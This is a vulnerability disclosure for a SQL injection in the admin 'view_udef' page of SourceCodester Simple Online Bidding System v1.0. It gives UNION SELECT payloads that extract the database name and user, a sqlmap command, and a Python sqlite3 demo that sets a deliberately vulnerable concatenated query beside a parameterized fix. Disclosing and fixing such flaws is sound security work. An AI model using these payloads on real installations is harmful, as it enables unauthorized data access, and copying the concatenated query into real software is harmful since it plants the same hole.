### Vulnerability Key Information

#### 1. Vulnerability Overview

- **Vulnerability Type**: SQL Injection
- **Affected System**: SourceCodester Simple Online Bidding System
- **Version**: v1.0
- **Official Website**: [https://www.sourcecodester.com/php/14558/simple-online-bidding-system-using-phpmysqli-source-code.html](https://www.sourcecodester.com/php/14558/simple-online-bidding-system-using-phpmysqli-source-code.html)

#### 2. Vulnerability Analysis

- **Route**: `/simple-online-bidding-system/admin/index.php?page=view_udef&id=1`
- **Injection Parameter**: `$_GET['id']`
- **Issue Description**: The parameter is directly concatenated into the SQL statement without any security protection, creating an SQL injection point.

#### 3. Vulnerability Verification and Exploitation

- **Verification Method**: Verified using UNION SELECT-based injection.
- **Example Payload**:

  ```
  page=view_udef&id=-2+union+select+1,2,3,4,5,6,7,8,9%23
  ```

- **Result**: Returns 9 query results; by selecting appropriate display positions (e.g., position 5 and 6), the database name and current database username can be retrieved.

#### 4. Exploitation Example

- **Query Database Name and Username**:
  - **Example Payload**:

    ```
    page=view_udef&id=-2 union select 1,2,3,4,database(), user(), 6,7,8,9%23
    ```

  - **Result**: Retrieved database name as `bid_db`, current database username as `root@localhost`.

#### 5. Verification with SQLMap

- **SQLMap Command**:

  ```bash
  python sqlmap.py -u "http://x.x.x.x/admin/index.php?page=view_udef&id=1" --cookie="PHPSESSID=xxxxx"
  ```

- **Identified Injection Point**:
  - Parameter `id` identified as injectable.
- **SQLMap Detected Injection Types**:
  - Boolean-based blind
  - Error-based
  - Time-based blind
  - UNION query

#### 6. Backend Database Information

- **Database Type**: MySQL
- **Web Application Technology**: PHP 5.5.9, Apache 2.4.39
- **Backend Database**: MySQL >= 5.0
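
The flaw described in section 2 (a request value concatenated into the SQL text) next to its fix, as an added example that is not code from the application or from the original report. It uses Python's built-in `sqlite3` as an offline stand-in for PHP/MySQLi; the table name `udef`, its columns and the sample row are constructed, and the input is the page's own UNION payload without the trailing `%23` comment marker.

```python
import re
import sqlite3

# Page's UNION payload, URL-decoded, without the trailing %23 (MySQL '#' comment).
PAYLOAD = "-2 union select 1,2,3,4,5,6,7,8,9"


def make_db():
    """In-memory stand-in table with 9 columns (constructed name and data)."""
    db = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i} TEXT" for i in range(2, 10))
    db.execute(f"CREATE TABLE udef (id INTEGER PRIMARY KEY, {cols})")
    db.execute("INSERT INTO udef VALUES (1,'a','b','c','d','e','f','g','h')")
    return db


def view_vulnerable(db, raw_id):
    # Flawed pattern: the request value becomes part of the SQL text, so
    # "union select ..." is parsed as SQL and its row reaches the page.
    return db.execute("SELECT * FROM udef WHERE id = " + raw_id).fetchall()


def view_bound(db, raw_id):
    # Bound parameter: the value is passed as data and never parsed as SQL.
    return db.execute("SELECT * FROM udef WHERE id = ?", (raw_id,)).fetchall()


def view_hardened(db, raw_id):
    # Defence in depth: accept only a short run of ASCII digits, then bind.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a plain integer")
    return view_bound(db, int(raw_id))


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", view_vulnerable(db, PAYLOAD))
    print("bound only:  ", view_bound(db, PAYLOAD))
    print("hardened id=1:", view_hardened(db, "1"))
```

In the PHP application the equivalent change is to validate `$_GET['id']` as an integer and run the query through a mysqli prepared statement (`prepare`, `bind_param`, `execute`) instead of string concatenation.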